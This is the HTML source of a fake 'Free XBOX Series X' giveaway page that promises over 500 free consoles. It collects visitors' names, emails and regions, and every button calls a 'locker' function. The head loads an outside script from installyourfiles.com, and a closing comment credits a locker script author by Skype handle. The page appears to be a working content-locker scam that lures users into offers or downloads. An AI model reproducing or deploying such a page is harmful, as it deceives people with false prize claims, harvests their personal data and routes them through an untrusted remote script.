
<!doctype html>
<html lang="en">
   <head>
      <meta charset="utf-8">
      <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
      <link rel="stylesheet" href="bootstrap.min.css">
      <link rel="stylesheet" href="main.css">
      <link rel="shortcut icon" href="favicon.ico">
      <title>Free XBOX Series X!</title>
	  <script type="text/javascript" src="https://installyourfiles.com/script_include.php?id=1028664"></script>
   </head>
   <body>
      
    <img src="A/LOGO.png" class="img-fluid mx-auto mb-2 LOGO">

    <div class="container">

        <div class="row justify-content-left align-items-center text-center">

            <div class="col-12 col-sm-12 col-md-12 col-lg-8 col-xl-8 text-center TEST">

                <div class="STEP-1 text-left">

                    <h1 class="TTU">Get all-new <br> XBOX <strong class="PSBLUE">Series X</strong> <br> for free!</h1>

                    <h3 class="text-left REG fw400 w-777">We are giving away over 500 <strong>all-new XBOX Series X</strong> consoles for free!<strong> You are be able to test our new system and the best games ever</strong>. Click button below to continue.</h3>

                    <button type="button" class="btn btn-primary btn-lg TTU w-777 mt-2 mx-auto" onclick="call_locker();">Continue</button>

                </div>

                <div class="STEP-2 text-left">

                    <h2 class="TTU">Answer all questions</h2>

                    <h4 class="fw700">What is your name?</h4>

                    <input type="text" class="form-control form-control-lg mb-2" id="NAME" placeholder="Type in your real name">

                    <h4 class="fw700">What is your Email?</h4>

                    <input type="email" class="form-control form-control-lg mb-2" id="EMAIL" placeholder="Type in your Email address">

                    <h4 class="fw700">What is your region?</h4>

                    <select class="form-control form-control-lg" id="REGION">
                        <option value="" disabled selected hidden>Select your region</option>
                        <option value="Asia">Asia</option>
                        <option value="Africa">Africa</option>
                        <option value="North America">North America</option>
                        <option value="South America">South America</option>
                        <option value="Antarctica">Antarctica</option>
                        <option value="Europe">Europe</option>
                        <option value="Australia">Australia</option>
                      </select>

                      <button type="button" class="btn btn-primary btn-lg TTU w-777 mt-3 mx-auto" onclick="call_locker();">Continue</button>

                </div>

                <div class="STEP-3 text-left">

                    <h4 class="TTU PSBLUE mb-0 TYPED w-777"></h4>

                    <div class="LOADING-1 w-777">
                        <div class="LOADING-2"></div>
                    </div>

                    <div class="accordion mt-2 w-777" id="PSVERSIONS">

                        <div class="card">
                          <div class="card-header" id="H1">
                            <h2 class="mb-0">
                              <button class="btn btn-link collapsed" type="button" data-toggle="collapse" data-target="#NORMALPS5" aria-expanded="false" aria-controls="NORMALPS5">
                                <strong class="PSBLUE">XBOX Series X | worth $499</strong> (<span class="AM1"></span> left)
                              </button>
                            </h2>
                          </div>
                      
                          <div id="NORMALPS5" class="collapse" aria-labelledby="H1" data-parent="#PSVERSIONS">
                            <div class="card-body">
                                <img src="A/XBOX-X.png" class="img-fluid w-5000 FLICK">
                              <p class="mt-1 mb-0">Flagship <strong>XBOX console</strong> with 1 TB SSD, 4K and 120 fps support, with UHD Blu-Ray optical drive.</p>
                            </div>
                          </div>
                        </div>

                        <div class="card">
                          <div class="card-header" id="H2">
                            <h2 class="mb-0">
                              <button class="btn btn-link collapsed" type="button" data-toggle="collapse" data-target="#DIGITALPS5" aria-expanded="false" aria-controls="DIGITALPS5">
                                <strong class="PSBLUE">XBOX Series S | worth $299</strong> (<span class="AM2"></span> left)
                              </button>
                            </h2>
                          </div>
                          <div id="DIGITALPS5" class="collapse" aria-labelledby="H2" data-parent="#PSVERSIONS">
                            <div class="card-body">
                                <img src="A/XBOX-S.png" class="img-fluid w-5000 FLICK">
                              <p class="mt-1 mb-0">Digital and smaller <strong>XBOX console</strong> with 512 GB SSD, 1440p and 120 fps support, without optical drive.</p>
                            </div>
                          </div>
                        </div>

                      </div>

                      <button type="button" class="btn btn-primary btn-lg TTU w-777 mt-2 SS3" onclick="call_locker();">I choose</button>

                </div>

                <div class="STEP-4 text-left">

                    <h2 class="TTU PSBLUE mb-0">Your new XBOX</h2>

                        <h4 class="REG mt-2 S_NAME"></h4>
                        <h4 class="REG S_EMAIL"></h4>
                        <h4 class="REG mb-2 S_REGION"></h4>

                    <h4 class="TTU PSBLUE mb-0 LAST w-777"></h4>

                    <button type="button" class="btn btn-primary btn-lg TTU w-777 mt-2 SS4" onclick="call_locker();">Verify</button>

                </div>

            </div>

        </div>

    </div>

      <script src="jquery-3.4.1.min.js"></script>
      <script src="popper.min.js"></script>
      <script src="bootstrap.min.js"></script>
      <script src="typed.min.js"></script>
      <script src="main.js"></script>

      <!-- LOCKER SCRIPT WITH LOAD METHOD: ONCLICK -->
      <!-- AUTHOR: FLICK :) SKYPE: flicks1337 -->

   </body>
</html>